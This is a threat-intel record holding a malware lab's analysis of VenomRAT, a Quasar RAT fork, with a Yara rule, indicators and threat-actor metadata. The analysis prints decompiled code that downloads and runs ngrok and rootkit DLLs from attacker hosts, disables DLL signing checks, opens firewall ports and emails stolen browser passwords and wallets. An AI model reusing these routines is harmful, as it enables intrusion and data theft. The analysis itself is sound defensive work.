{
	"id": "f1533ad1-9792-482e-9ae9-09aade182f2a",
	"created_at": "2026-04-06T00:18:33.291316Z",
	"updated_at": "2026-04-10T03:37:09.420974Z",
	"deleted_at": null,
	"sha1_hash": "89f7fb7b421848e7da6961809778cbdb65fd8a58",
	"title": "VenomRAT - new, hackforums grade, reincarnation of QuasarRAT",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 965250,
	"plain_text": "VenomRAT - new, hackforums grade, reincarnation of QuasarRAT\r\nPublished: 2020-06-22 · Archived: 2026-04-05 18:51:31 UTC\r\nIntro\r\nDuring routine hunting we stumbled upon a new Remote Administration Toolkit (RAT), named Venom RAT. Like with many\r\nsuch tools, the authors are conducting their business under the false pretense of providing a tool to remotely manage your own\r\ncomputers.\r\nAs one can see on the screenshot above, this tool possesses essential capabilities to manage your own computers, such as:\r\nKeylogger\r\nStealer\r\nUAC Bypass\r\nPassword Recovery (stealing)\r\nAll those for the small price of 150$ per month.\r\nWhat do we get for it? Let’s find out.\r\nTechnical Details [1]\r\nThis RAT is a revamped version of the infamous Quasar RAT, most likely based on this fork. The following new commands were\r\nadded:\r\nDoInstallVNC\r\nDoInstallRDP\r\nDoStealer\r\nDoRemoveVnc\r\nDoRemoveRdp\r\nGetVncInfo\r\nGetRdpInfo\r\nGetAllPasswords\r\nhttps://blog.malwarelab.pl/posts/venom/\r\nPage 1 of 9\n\nOn top of that, a rootkit was added to help hide the malicious software. This adds the following capabilities to the already extensive list\r\nof what Quasar RAT can do:\r\nRootkit hiding processes and files\r\nVNC connection\r\nRDP connection\r\nGeneric Stealer\r\nNothing particularly groundbreaking, but the way the authors decided to implement it is quite shocking, as none of those\r\nextensions are part of the malware binary. 
Instead, a new executable is downloaded from a hardcoded address and run:\r\npublic static void Ngrok(string token)\r\n{\r\ntry\r\n{\r\nStreamWriter streamWriter = new StreamWriter(Path.Combine(Path.GetTempPath(), \"rdp.bat\r\nstreamWriter.WriteLine(\"set downloadURL=http://91.134.207.16/ngrok.exe\");\r\nstreamWriter.WriteLine(\"set logFile=%TEMP%\\\\proclog.txt\");\r\nstreamWriter.WriteLine(\"set exeFile=%TEMP%\\\\ngrok.exe\");\r\nstreamWriter.WriteLine(\"powershell (new-object System.Net.WebClient).DownloadFile('htt\r\nstreamWriter.WriteLine(\"%exeFile% authtoken \" + token);\r\nstreamWriter.WriteLine(\"%exeFile% tcp 3389 \u003e %logFile%\");\r\nstreamWriter.Close();\r\nstring fileName = Path.Combine(Path.GetTempPath(), \"rdp.bat\");\r\nProcess.Start(new ProcessStartInfo\r\n{\r\nFileName = fileName,\r\nCreateNoWindow = true,\r\nWindowStyle = ProcessWindowStyle.Hidden,\r\nUseShellExecute = true,\r\nErrorDialog = false\r\n});\r\nThread.Sleep(30000);\r\nmodule2.geturl();\r\n}\r\ncatch (Exception)\r\n{\r\n}\r\n}\r\nRootkit (dc6ce53e100795c72f4db35a8cfd9294cc564cd82c8f59468fa94c7c0cf0b0de)\r\nThe following code is responsible for fetching and installing the DLL containing the rootkit:\r\npublic static void Install(bool is64bit)\r\n{\r\nstring path = Path.Combine(Settings.DIRECTORY, Settings.SUBDIRECTORY);\r\nif (root.IsAdmin())\r\n{\r\nstring link = \"https://payloads-poison.000webhostapp.com/r77-x64.dll\";\r\nstring link2 = \"https://payloads-poison.000webhostapp.com/r77-x86.dll\";\r\nstring name = \"r77-x64.dll\";\r\nstring name2 = \"r77-x86.dll\";\r\nmodule2.download(link, name);\r\nmodule2.download(link2, name2);\r\nstring text = \"x\" + (is64bit ? 
64 : 86).ToString() + \".dll\";\r\nstring text2 = Path.Combine(Path.GetTempPath(), \"$77-\" + Guid.NewGuid().ToString(\"N\")\r\nFile.Copy(Path.Combine(path, \"r77-\" + text), text2);\r\nnew FileInfo(text2).Attributes |= FileAttributes.Temporary;\r\nusing (RegistryKey registryKey = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, is\r\n{\r\nregistryKey.SetValue(\"LoadAppInit_DLLs\", 1);\r\nregistryKey.SetValue(\"RequireSignedAppInit_DLLs\", 0);\r\nregistryKey.SetValue(\"AppInit_DLLs\", text2);\r\n}\r\nstring path2 = Path.Combine(path, \"r77-x64.dll\");\r\nstring path3 = Path.Combine(path, \"r77-x86.dll\");\r\nFile.SetAttributes(path2, FileAttributes.Hidden);\r\nFile.SetAttributes(path3, FileAttributes.Hidden);\r\nreturn;\r\n}\r\nstring link3 = \"https://payloads-poison.000webhostapp.com/r77-x64.dll\";\r\nstring link4 = \"https://payloads-poison.000webhostapp.com/r77-x86.dll\";\r\nstring name3 = \"r77-x64.dll\";\r\nstring name4 = \"r77-x86.dll\";\r\nmodule2.download(link3, name3);\r\nmodule2.download(link4, name4);\r\nstring text3 = \"x\" + (is64bit ? 64 : 86).ToString() + \".dll\";\r\nstring text4 = Path.Combine(Path.GetTempPath(), \"$77-\" + Guid.NewGuid().ToString(\"N\") + \"-\" + t\r\nFile.Copy(Path.Combine(path, \"r77-\" + text3), text4);\r\nnew FileInfo(text4).Attributes |= FileAttributes.Temporary;\r\nusing (RegistryKey registryKey2 = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, is64bit ?\r\n{\r\nregistryKey2.SetValue(\"LoadAppInit_DLLs\", 1);\r\nregistryKey2.SetValue(\"RequireSignedAppInit_DLLs\", 0);\r\nregistryKey2.SetValue(\"AppInit_DLLs\", text4);\r\n}\r\nstring path4 = Path.Combine(path, \"r77-x64.dll\");\r\nstring path5 = Path.Combine(path, \"r77-x86.dll\");\r\nFile.SetAttributes(path4, FileAttributes.Hidden);\r\nFile.SetAttributes(path5, FileAttributes.Hidden);\r\n}\r\nThe code of this rootkit can be found on GitHub: https://github.com/bytecode77/r77-rootkit. 
This rootkit will hide anything\r\n(processes, files, etc.) with the prefix $77, hence the names of running VenomRAT binaries will start with $77. This is also clearly\r\nvisible in the project files, for example in the .csproj, which is part of every C# project and describes its basic properties.\r\n \u003cRootNamespace\u003e$77-Venom\u003c/RootNamespace\u003e\r\n \u003cAssemblyName\u003e$77-Venom\u003c/AssemblyName\u003e\r\nIn addition to the DLL being fetched from the internet, 2 more binaries are extracted from resources and dropped:\r\nChrome - 1bb6f045a9218bacd2c0f35f2e9fb3f0a92f5bdd7efd207b070c47707a6ae82d, a tool based on\r\nUACSilentCleanup used to bypass UAC\r\nInstall - 74f157d228b19efbe878feb76a5be3caeb1cdd11c59ee3ec9622dbd994081310, installer for the r77 rootkit, will\r\nadd r77-x86.dll and r77-x64.dll into the AppInit_DLLs auto-load mechanism.\r\nStealer (f053af636e8ec15d133a92aceb4187027aa7a8d4e91e8217e87155037fbdc6ef)\r\nProbably the author’s own creation, named by them Velos Stealer, is a very simple C# program capable of stealing the following\r\ndata:\r\nFiles on the desktop (with extensions .doc, .docx, .txt and .log)\r\nInfo about used FTP servers from FileZilla (filezilla_recentservers.xml, filezilla_sitemanager.xml)\r\nCryptocurrency wallets (BitcoinCore, Electrum, LTC, ETH, DSH, XMR, ZEC1)\r\nSaved passwords from browsers\r\nSaved credit card data from browsers\r\nSaved cookies from browsers\r\nCached forms auto-filled by browsers\r\nStolen data will be saved into separate files (Passwords.txt, Cookies.txt, CC.txt, Autofill.txt) and later compressed\r\ninto Passwords.zip\r\nVNC (517e1659c9d9ee4de266b3ade2d06965b670d17082ae2c2c97b4c694bb29152a)\r\nThis file is UltraVNC, packed with UPX and wrapped into some sort of installer. 
As in most cases, installation will be\r\ndone through an ad-hoc created .bat script:\r\nStreamWriter streamWriter = new StreamWriter(Path.Combine(Path.GetTempPath(), \"dvnc.bat\"));\r\nstreamWriter.WriteLine(\"set logFile=%TEMP%\\\\proclog.txt\");\r\nstreamWriter.WriteLine(\"set exeFile=%TEMP%\\\\Install.exe\");\r\nstreamWriter.WriteLine(\"set logFile=%TEMP%\\\\proclog.txt\");\r\nstreamWriter.WriteLine(\"powershell (new-object System.Net.WebClient).DownloadFile('http://91.13\r\nRDP\r\nIn order to install RDP on the victim’s computer, a few scripts and binaries will be downloaded and run.\r\nHosting URL | File Name | SHA256\r\nhxxp://91.134.207[.]16/rdpinstall.exe | installrdp.exe | 28d7a2216d76d1420f14c4aea0cc466d49674c9c17d078d365cc346a560b79a1\r\nhxxp://91.134.207[.]16/autoupdate1.exe | autoupdate1.exe | ba3354e03dbb64b11989acc4593d7103097083c128f3bca86bfb8776cb279001\r\nhxxp://91.134.207[.]16/autoupdate2.exe | autoupdate2.exe | c1bf6f0dca24c0f99e8f0998c45b5a1c21b68cb98507210a303abee7abba8b29\r\nhttp://91.134.207.16/update.exe | updaterdp.exe | 57aece1eeca1ac5f5ccf23bb06b30b56c7339fe434c1c33d86a9c0fa44e1cad5\r\nBefore those files are run, some steps are taken to prepare the environment, more precisely:\r\nCleanup; all files from %TEMP% are removed and processes named cmd, conhost, installrdp, installrdp,\r\nupdaterdp, Install, winvnc are killed\r\nRemote Desktop is enabled by manipulating registry keys\r\nAccess to the Remote Desktop port is enabled on the firewall\r\n%ProgramFiles%\\RDP Wrapper is added to the list of paths ignored by Windows Defender.\r\nUser Venom with password Venom is added as an administrator with the ability to use Remote Desktop\r\nNgrok\r\nBoth RDP and VNC are tunneled through the ngrok.io network. In order to achieve that, the ngrok client is downloaded from\r\nhxxp://91.134.207[.]16/ngrok.exe and another utility named getrdp.exe 
(from\r\nhxxp://91.134.207[.]16/getrdp.exe) [4] is used to enumerate available tunnels and send that data back to the C2. getrdp.exe\r\nis another SFX archive, this time containing curl.exe and jq.exe, both benign tools.\r\nExfiltration\r\nThe authors decided to implement an unusual strategy of exfiltrating stolen data: first a file is put onto an FTP server using\r\nthe WinSCP client and later an email with the file attached is sent. The credentials needed for authorization to the FTP and SMTP\r\nservers are sent in the command initiating data stealing.\r\nFTP exfiltration\r\nIn the code one can actually find two functions responsible for uploading data onto the FTP server, one using pure PowerShell\r\nand the other the aforementioned WinSCP.com.\r\nSMTP exfiltration\r\nIn similar fashion to FTP, the malware has two functions for sending emails, one relying on PowerShell and the second on\r\nblat.exe [5]; the PowerShell method will write a script into %TEMP%\\send.ps1.\r\nExfiltration via Ngrok\r\nFor both FTP and SMTP, the designated channel was supposed to be an Ngrok tunnel; however, the authors don’t really understand how\r\ntunneling works and are oblivious to the fact that you need an SMTP/FTP service on the machine to be able to use it, and that when\r\nyou are tunneling traffic via a 3rd-party service you don’t need to open any ports.\r\npublic static void SendFile(string filepath, string email, string toemail, string password, string token\r\n{\r\nmodule2.fixports();\r\nmodule2.sendfuckingemail(token);\r\ntry\r\n{\r\nStreamWriter streamWriter = new StreamWriter(Path.Combine(Path.GetTempPath(), \"send.ps\r\nPath.Combine(Path.GetTempPath(), \"blat.exe\");\r\nstreamWriter.WriteLine(\"$SMTPServer = 'smtp.gmail.com';\");\r\nstreamWriter.WriteLine(\"$SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587);\"\r\nstreamWriter.WriteLine(\"$SMTPInfo.EnableSsl = $true;\");\r\nstreamWriter.WriteLine(string.Concat(new string[]\r\n{\r\n\"$SMTPInfo.Credentials = 
New-Object System.Net.NetworkCredential('\",\r\nemail,\r\n\"', '\",\r\npassword,\r\n\"');\"\r\n}));\r\nstreamWriter.WriteLine(\"$ReportEmail = New-Object System.Net.Mail.MailMessage;\");\r\nstreamWriter.WriteLine(\"$ReportEmail.From = '\" + email + \"';\");\r\nstreamWriter.WriteLine(\"$ReportEmail.To.Add('\" + toemail + \"');\");\r\nstreamWriter.WriteLine(\"$ReportEmail.Subject = 'Velos Stealer Report';\");\r\nstreamWriter.WriteLine(\"$ReportEmail.Body = 'Velos Stealer report in the attachments.'\r\nstreamWriter.WriteLine(\"$ReportEmail.Attachments.Add('\" + filepath + \"');\");\r\nstreamWriter.WriteLine(\"$SMTPInfo.Send($ReportEmail);\");\r\nstreamWriter.Close();\r\nThread.Sleep(5000);\r\nstring str = Path.Combine(Path.GetTempPath(), \"send.ps1\");\r\nProcess.Start(new ProcessStartInfo\r\n{\r\nFileName = \"cmd\",\r\nArguments = \"/k start /b powershell -ExecutionPolicy Bypass \" + str + \"; \u0026 ex\r\nCreateNoWindow = true,\r\nWindowStyle = ProcessWindowStyle.Hidden,\r\nUseShellExecute = true,\r\nErrorDialog = false\r\n}).WaitForExit();\r\nThread.Sleep(40000);\r\nmodule2.killpro();\r\nModule1.cleantemp();\r\n}\r\ncatch (Exception)\r\n{\r\n}\r\n}\r\npublic static void sendfuckingftp(string token)\r\n{\r\ntry\r\n{\r\nStreamWriter streamWriter = new StreamWriter(Path.Combine(Path.GetTempPath(), \"fixftp.\r\nstreamWriter.WriteLine(\"set downloadURL=http://91.134.207.16/ngrok.exe\");\r\nstreamWriter.WriteLine(\"set logFile=%TEMP%\\\\proclog.txt\");\r\nstreamWriter.WriteLine(\"set exeFile=%TEMP%\\\\ngrok.exe\");\r\nstreamWriter.WriteLine(\"set logFile=%TEMP%\\\\proclog.txt\");\r\nstreamWriter.WriteLine(\"powershell (new-object System.Net.WebClient).DownloadFile('%do\r\nstreamWriter.WriteLine(\"%exeFile% authtoken \" + token);\r\nstreamWriter.WriteLine(\"%exeFile% tcp 21 \u003e %logFile%\");\r\nstreamWriter.Close();\r\nstring fileName = Path.Combine(Path.GetTempPath(), \"fixftp.bat\");\r\nProcess.Start(new 
ProcessStartInfo\r\n{\r\nFileName = fileName,\r\nCreateNoWindow = true,\r\nWindowStyle = ProcessWindowStyle.Hidden,\r\nUseShellExecute = true,\r\nErrorDialog = false\r\n});\r\n}\r\ncatch (Exception)\r\n{\r\n}\r\n}\r\npublic static void fixports()\r\n{\r\nProcess.Start(new ProcessStartInfo\r\n{\r\nFileName = \"cmd\",\r\nArguments = \"/k start /b netsh advfirewall firewall add rule name=SMTP1 dir=in action=\r\nCreateNoWindow = true,\r\nWindowStyle = ProcessWindowStyle.Hidden,\r\nUseShellExecute = true,\r\nErrorDialog = false\r\n});\r\n....\r\nConclusion\r\nVenomRAT is yet another RAT published on hackforums, an infamous hatchery of incapable hacker-wannabes. While the\r\nauthor has some interesting ideas, his lack of programming skills and understanding of how systems and networks work\r\nprevents him from fully implementing them. Despite all of those shortcomings (or maybe due to them) it generates quite a buzz on\r\nthe forum.\r\nWhile Quasar RAT and its forks are used by a few actors, including APT33, Dropping Elephant, Stone Panda, The Gorgon\r\nGroup [6], it is very unlikely that this tool will ever be used by any serious threat actor.\r\nAt a price of 150$ per month it doesn’t sound like an option for aspiring criminals either; however, we found quite a few\r\nsamples ITW and are waiting impatiently for upgrades that will fix all of the errors and misconceptions. 
For now it is\r\njust another example of a company selling malicious software under the umbrella of an elaborate TOS.\r\nAnalysis Artifacts\r\nYara\r\nrule VenomRAT {\r\n meta:\r\n reference = \"https://blog.malwarelab.pl/posts/venom/\"\r\n author = \"Maciej Kotowicz, mak@malwarelab.pl\"\r\n copyright = \"MalwareLab.pl\"\r\n date = \"2020-06-10\"\r\n hash = \"7128a2488b2d0084465ca1602a844eafb191de938fc70098d86cb65d17734778\"\r\n hash = \"95cc84715a64ff8271814d69dc2c71d8ec22476a1d580d645e1a9dba625a789c\"\r\n hash = \"74cbcffcfa82c021f1ed8f403b80ea2047f4f0d9238ab31560348910b5dcbc4f\"\r\n strings:\r\n $a0 = \"[-] Unable to Create the Enviroment Variabled %windir%.\" wide\r\n $a1 = \"Velos Stealer Report \u003e\u003e %PSScript%\" wide\r\n $a2 = \"Checking if itadmin is part of Administrators Group\" wide\r\n $a3 = \"/k start /b wusa /uninstall /kb:4471332 /quiet \u0026 exit\" wide\r\n $a4 = \"[+] Waiting 5 seconds before execution.\" wide\r\n condition:\r\n 2 of them\r\n}\r\nHashes\r\nThe full list of hashes can be found on our github\r\nC2 Servers\r\nThe full list of hashes can be found on our github\r\n$77payload\r\nAfro\r\nApplication\r\nAYUb\r\nClient\r\nctOS_Users\r\nDiscord\r\nFatality\r\nForthack\r\nFPSBooster\r\nFriends\r\nHacked by Seliax\r\nHusky\r\nidiot\r\nIdiot\r\nJava Updater\r\nJoel\r\nLoL Checker\r\nLunar Xray\r\nMarisa\r\nMarisa1\r\nMinecraft Launcher\r\nmp4\r\nOffice04\r\nOffice05\r\nOffice1\r\nOffice2016\r\nOfficePacket004\r\nOfficeXS20\r\nOpfer\r\nOtohits\r\nPC1\r\nPrimoTest\r\nRayan\r\nREAL\r\nretarded\r\nSearch\r\nStart\r\ntest\r\nTest\r\nTest01\r\ntestme\r\nValorantChecker\r\nVenom\r\nVenom Client\r\nVenom Slave\r\nVenom Test\r\nVictimes\r\nX_Ray\r\nChrome\r\nChrome_Update\r\nZombie\r\nMutexes\r\nAll mutexes can be described with the following regex: 
VNM_MUTEX_[a-zA-Z]{18}\r\nFilenames\r\n$$77Antimalware.exe\r\n$77$test!.exe\r\n$77ashapayload.exe\r\n$77-chrome.exe\r\n$77client.exe\r\n$77Client!.exe\r\n$77Client.exe\r\n$77driverD.exe\r\n$77Java_Updater.exe\r\n$77nordvpn.exe\r\n$77-Office.exe\r\n$77Steem.exe\r\n$77TeksurnaGrafika.exe\r\n$77TestC.exe\r\n$77Test.exe\r\n$77-venom.exe\r\n$77WinSheduler.exe\r\n$77WinUpdate.exe\r\n$77-winupdater.exe\r\n$77XXX.exe\r\n$ClientRun.exe\r\nClient.exe\r\nClientuisis.exe\r\nDllhost.exe\r\nForthack.exe\r\nfSociety.exe\r\nGoogleUpdaTes.exe\r\niusnBase.exe\r\nJai.exe\r\nMicrosoft.exe\r\nMicrosoftUpdate.exe\r\nMicrosoftWindowsGrahpy.exe\r\nMUAHHA.exe\r\nOffice2016.exe\r\nofficeupdate.exe\r\nOtohits.exe\r\nruby.exe\r\nRuntimeBroker.exe\r\nSearch.exe\r\nSelf-Bot-github.exe\r\nservices.exe\r\nSuperAdmin.exe\r\nsvchost.exe\r\nTarea.exe\r\ntelegram.exe\r\nUpdater.exe\r\nVega.exe\r\nVenom.exe\r\nvenomkongregate.exe\r\nWinDefend.exe\r\nWindows Defender.exe\r\nwindowsoperator.exe\r\nWindowsUpdate.exe\r\nwinsvr.exe\r\nWndProc.exe\r\n$77Your Phone.exe\r\nAuxiliary Source\r\n$77sys.exe\r\nZ-Flix Cracked by Seliax.exe\r\n1. Analysis was performed based on a debug build\r\n( 7128a2488b2d0084465ca1602a844eafb191de938fc70098d86cb65d17734778 ) representing version 2.1.0.0; this version\r\nmatches all of the samples of this malware we found ITW\r\n2. This feature will probably be added in the next version; for now the function responsible for it is empty\r\n3. https://github.com/stascorp/rdpwrap\r\n4. autoupdate.bat is a legitimate file, part of RDP Wrapper, that will add itself as a scheduled task\r\n5. https://www.blat.net/\r\n6. https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat\r\nSource: https://blog.malwarelab.pl/posts/venom/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.malwarelab.pl/posts/venom/"
	],
	"report_names": [
		"venom"
	],
	"threat_actors": [
		{
			"id": "a63c994f-d7d6-4850-a881-730635798b90",
			"created_at": "2025-08-07T02:03:24.788883Z",
			"updated_at": "2026-04-10T02:00:03.785146Z",
			"deleted_at": null,
			"main_name": "COBALT TRINITY",
			"aliases": [
				"APT33 ",
				"Elfin ",
				"HOLMIUM ",
				"MAGNALIUM ",
				"Peach Sandstorm ",
				"Refined Kitten ",
				"TA451 "
			],
			"source_name": "Secureworks:COBALT TRINITY",
			"tools": [
				"AutoCore",
				"Cadlotcorg",
				"Dello RAT",
				"FalseFont",
				"Imminent Monitor",
				"KDALogger",
				"Koadic",
				"NanoCore",
				"NetWire",
				"POWERTON",
				"PoshC2",
				"Poylog",
				"PupyRAT",
				"Schoolbag"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ec14074c-8517-40e1-b4d7-3897f1254487",
			"created_at": "2023-01-06T13:46:38.300905Z",
			"updated_at": "2026-04-10T02:00:02.918468Z",
			"deleted_at": null,
			"main_name": "APT10",
			"aliases": [
				"Red Apollo",
				"HOGFISH",
				"BRONZE RIVERSIDE",
				"G0045",
				"TA429",
				"Purple Typhoon",
				"STONE PANDA",
				"Menupass Team",
				"happyyongzi",
				"CVNX",
				"Cloud Hopper",
				"ATK41",
				"Granite Taurus",
				"POTASSIUM"
			],
			"source_name": "MISPGALAXY:APT10",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "bbf66d2d-3d20-4026-a2b5-56b31eb65de4",
			"created_at": "2025-08-07T02:03:25.123407Z",
			"updated_at": "2026-04-10T02:00:03.668131Z",
			"deleted_at": null,
			"main_name": "ZINC EMERSON",
			"aliases": [
				"Confucius ",
				"Dropping Elephant ",
				"EHDevel ",
				"Manul ",
				"Monsoon ",
				"Operation Hangover ",
				"Patchwork ",
				"TG-4410 ",
				"Viceroy Tiger "
			],
			"source_name": "Secureworks:ZINC EMERSON",
			"tools": [
				"Enlighten Infostealer",
				"Hanove",
				"Mac OS X KitM Spyware",
				"Proyecto2",
				"YTY Backdoor"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "7ea1e0de-53b9-4059-802f-485884180701",
			"created_at": "2022-10-25T16:07:24.04846Z",
			"updated_at": "2026-04-10T02:00:04.84985Z",
			"deleted_at": null,
			"main_name": "Patchwork",
			"aliases": [
				"APT-C-09",
				"ATK 11",
				"Capricorn Organisation",
				"Chinastrats",
				"Dropping Elephant",
				"G0040",
				"Maha Grass",
				"Quilted Tiger",
				"TG-4410",
				"Thirsty Gemini",
				"Zinc Emerson"
			],
			"source_name": "ETDA:Patchwork",
			"tools": [
				"AndroRAT",
				"Artra Downloader",
				"ArtraDownloader",
				"AutoIt backdoor",
				"BADNEWS",
				"BIRDDOG",
				"Bahamut",
				"Bozok",
				"Bozok RAT",
				"Brute Ratel",
				"Brute Ratel C4",
				"CinaRAT",
				"Crypta",
				"ForeIT",
				"JakyllHyde",
				"Loki",
				"Loki.Rat",
				"LokiBot",
				"LokiPWS",
				"NDiskMonitor",
				"Nadrac",
				"PGoShell",
				"PowerSploit",
				"PubFantacy",
				"Quasar RAT",
				"QuasarRAT",
				"Ragnatela",
				"Ragnatela RAT",
				"SocksBot",
				"TINYTYPHON",
				"Unknown Logger",
				"WSCSPL",
				"Yggdrasil"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "ba9fa308-a29a-4928-9c06-73aafec7624c",
			"created_at": "2024-05-01T02:03:07.981061Z",
			"updated_at": "2026-04-10T02:00:03.750803Z",
			"deleted_at": null,
			"main_name": "BRONZE RIVERSIDE",
			"aliases": [
				"APT10 ",
				"CTG-5938 ",
				"CVNX ",
				"Hogfish ",
				"MenuPass ",
				"MirrorFace ",
				"POTASSIUM ",
				"Purple Typhoon ",
				"Red Apollo ",
				"Stone Panda "
			],
			"source_name": "Secureworks:BRONZE RIVERSIDE",
			"tools": [
				"ANEL",
				"AsyncRAT",
				"ChChes",
				"Cobalt Strike",
				"HiddenFace",
				"LODEINFO",
				"PlugX",
				"PoisonIvy",
				"QuasarRAT",
				"QuasarRAT Loader",
				"RedLeaves"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df",
			"created_at": "2023-01-06T13:46:38.402513Z",
			"updated_at": "2026-04-10T02:00:02.959797Z",
			"deleted_at": null,
			"main_name": "Sandworm",
			"aliases": [
				"IRIDIUM",
				"Blue Echidna",
				"VOODOO BEAR",
				"FROZENBARENTS",
				"UAC-0113",
				"Seashell Blizzard",
				"UAC-0082",
				"APT44",
				"Quedagh",
				"TEMP.Noble",
				"IRON VIKING",
				"G0034",
				"ELECTRUM",
				"TeleBots"
			],
			"source_name": "MISPGALAXY:Sandworm",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c81067e0-9dcb-4e3f-abb0-80126519c5b6",
			"created_at": "2022-10-25T15:50:23.285448Z",
			"updated_at": "2026-04-10T02:00:05.282202Z",
			"deleted_at": null,
			"main_name": "Patchwork",
			"aliases": [
				"Hangover Group",
				"Dropping Elephant",
				"Chinastrats",
				"Operation Hangover"
			],
			"source_name": "MITRE:Patchwork",
			"tools": [
				"NDiskMonitor",
				"QuasarRAT",
				"BackConfig",
				"TINYTYPHON",
				"AutoIt backdoor",
				"PowerSploit",
				"BADNEWS",
				"Unknown Logger"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "e5ff825b-0456-4013-b90a-971b93def74a",
			"created_at": "2022-10-25T15:50:23.824058Z",
			"updated_at": "2026-04-10T02:00:05.377261Z",
			"deleted_at": null,
			"main_name": "APT33",
			"aliases": [
				"APT33",
				"HOLMIUM",
				"Elfin",
				"Peach Sandstorm"
			],
			"source_name": "MITRE:APT33",
			"tools": [
				"PowerSploit",
				"AutoIt backdoor",
				"PoshC2",
				"Mimikatz",
				"NanoCore",
				"DEADWOOD",
				"StoneDrill",
				"POWERTON",
				"LaZagne",
				"TURNEDUP",
				"NETWIRE",
				"Pupy",
				"ftp"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad",
			"created_at": "2022-10-25T16:07:23.590051Z",
			"updated_at": "2026-04-10T02:00:04.679488Z",
			"deleted_at": null,
			"main_name": "Energetic Bear",
			"aliases": [
				"ATK 6",
				"Blue Kraken",
				"Crouching Yeti",
				"Dragonfly",
				"Electrum",
				"Energetic Bear",
				"G0035",
				"Ghost Blizzard",
				"Group 24",
				"ITG15",
				"Iron Liberty",
				"Koala Team",
				"TG-4192"
			],
			"source_name": "ETDA:Energetic Bear",
			"tools": [
				"Backdoor.Oldrea",
				"CRASHOVERRIDE",
				"Commix",
				"CrackMapExec",
				"CrashOverride",
				"Dirsearch",
				"Dorshel",
				"Fertger",
				"Fuerboos",
				"Goodor",
				"Havex",
				"Havex RAT",
				"Hello EK",
				"Heriplor",
				"Impacket",
				"Industroyer",
				"Karagany",
				"Karagny",
				"LightsOut 2.0",
				"LightsOut EK",
				"Listrix",
				"Oldrea",
				"PEACEPIPE",
				"PHPMailer",
				"PsExec",
				"SMBTrap",
				"Subbrute",
				"Sublist3r",
				"Sysmain",
				"Trojan.Karagany",
				"WSO",
				"Webshell by Orb",
				"Win32/Industroyer",
				"Wpscan",
				"nmap",
				"sqlmap",
				"xFrost"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa",
			"created_at": "2022-10-25T16:47:55.919702Z",
			"updated_at": "2026-04-10T02:00:03.618194Z",
			"deleted_at": null,
			"main_name": "IRON VIKING",
			"aliases": [
				"APT44 ",
				"ATK14 ",
				"BlackEnergy Group",
				"Blue Echidna ",
				"CTG-7263 ",
				"ELECTRUM ",
				"FROZENBARENTS ",
				"Hades/OlympicDestroyer ",
				"IRIDIUM ",
				"Qudedagh ",
				"Sandworm Team ",
				"Seashell Blizzard ",
				"TEMP.Noble ",
				"Telebots ",
				"Voodoo Bear "
			],
			"source_name": "Secureworks:IRON VIKING",
			"tools": [
				"BadRabbit",
				"BlackEnergy",
				"GCat",
				"NotPetya",
				"PSCrypt",
				"TeleBot",
				"TeleDoor",
				"xData"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "04b07437-41bb-4126-bcbb-def16f19d7c6",
			"created_at": "2022-10-25T16:07:24.232628Z",
			"updated_at": "2026-04-10T02:00:04.906097Z",
			"deleted_at": null,
			"main_name": "Stone Panda",
			"aliases": [
				"APT 10",
				"ATK 41",
				"Bronze Riverside",
				"CTG-5938",
				"CVNX",
				"Cuckoo Spear",
				"Earth Kasha",
				"G0045",
				"G0093",
				"Granite Taurus",
				"Happyyongzi",
				"Hogfish",
				"ITG01",
				"Operation A41APT",
				"Operation Cache Panda",
				"Operation ChessMaster",
				"Operation Cloud Hopper",
				"Operation Cuckoo Spear",
				"Operation New Battle",
				"Operation Soft Cell",
				"Operation TradeSecret",
				"Potassium",
				"Purple Typhoon",
				"Red Apollo",
				"Stone Panda",
				"TA429",
				"menuPass",
				"menuPass Team"
			],
			"source_name": "ETDA:Stone Panda",
			"tools": [
				"Agent.dhwf",
				"Agentemis",
				"Anel",
				"AngryRebel",
				"BKDR_EVILOGE",
				"BKDR_HGDER",
				"BKDR_NVICM",
				"BUGJUICE",
				"CHINACHOPPER",
				"ChChes",
				"China Chopper",
				"Chymine",
				"CinaRAT",
				"Cobalt Strike",
				"CobaltStrike",
				"DARKTOWN",
				"DESLoader",
				"DILLJUICE",
				"DILLWEED",
				"Darkmoon",
				"DelfsCake",
				"Derusbi",
				"Destroy RAT",
				"DestroyRAT",
				"Ecipekac",
				"Emdivi",
				"EvilGrab",
				"EvilGrab RAT",
				"FYAnti",
				"Farfli",
				"Gen:Trojan.Heur.PT",
				"Gh0st RAT",
				"Ghost RAT",
				"GreetCake",
				"HAYMAKER",
				"HEAVYHAND",
				"HEAVYPOT",
				"HTran",
				"HUC Packet Transmit Tool",
				"Ham Backdoor",
				"HiddenFace",
				"Impacket",
				"Invoke the Hash",
				"KABOB",
				"Kaba",
				"Korplug",
				"LODEINFO",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"MiS-Type",
				"Mimikatz",
				"Moudour",
				"Mydoor",
				"NBTscan",
				"NOOPDOOR",
				"Newsripper",
				"P8RAT",
				"PCRat",
				"PlugX",
				"Poison Ivy",
				"Poldat",
				"PowerSploit",
				"PowerView",
				"PsExec",
				"PsList",
				"Quarks PwDump",
				"Quasar RAT",
				"QuasarRAT",
				"RedDelta",
				"RedLeaves",
				"Rubeus",
				"SNUGRIDE",
				"SPIVY",
				"SharpSploit",
